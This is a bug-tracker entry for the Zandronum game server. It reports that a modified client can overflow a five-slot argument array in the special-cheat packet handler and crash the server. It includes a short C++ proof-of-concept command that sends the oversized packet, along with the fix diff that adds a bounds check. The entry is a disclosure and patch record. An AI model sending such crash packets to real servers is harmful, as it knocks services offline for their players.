View Issue Details [ Jump to Notes ] | [ Issue History ] [ Print ] |
ID | Project | Category | View Status | Date Submitted | Last Update |
0002694 | Zandronum | [All Projects] Bug | public | 2016-04-02 22:11 | 2018-09-30 22:33 |
|
Reporter | Dusk | |
Assigned To | Dusk | |
Priority | normal | Severity | exploit | Reproducibility | always |
Status | closed | Resolution | fixed | |
Platform | | OS | | OS Version | |
Product Version | 3.0-beta | |
Target Version | 3.0 | Fixed in Version | | |
|
Summary | 0002694: Modified client can crash the server using the special cheat |
Description | The server reads in special args and stores them in an array of 5... but can read in more than 5 args. This can be exploited to crash the server. Since this is done in network reading code, sv_cheats does not have to be enabled. |
Steps To Reproduce |
#include "c_dispatch.h"
CCMD (crashserver)
{
NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, CLC_SPECIALCHEAT );
NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 10 );
for ( unsigned int i = 0; i < 10; ++i )
NETWORK_WriteLong( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
}
|
|
Attached Files | 2694-fix.diff [^] (621 bytes) 2016-04-02 22:41 [Show Content] [Hide Content]diff --git a/src/sv_main.cpp b/src/sv_main.cpp
--- a/src/sv_main.cpp
+++ b/src/sv_main.cpp
@@ -4597,6 +4597,16 @@
unsigned int argsSent = NETWORK_ReadByte( pByteStream );
int args[5] = { 0, 0, 0, 0, 0 };
+ // [TP] Ensure that the client does not send more than five arguments.
+ if ( argsSent > countof( args ))
+ {
+ for ( unsigned int i = 0; i < argsSent; ++i )
+ NETWORK_ReadLong( pByteStream );
+
+ SERVER_KickPlayer( g_lCurrentClient, "Sent an invalid packet." );
+ return true;
+ }
+
for ( unsigned int i = 0; i < argsSent; ++i )
args[i] = NETWORK_ReadLong( pByteStream );
|
|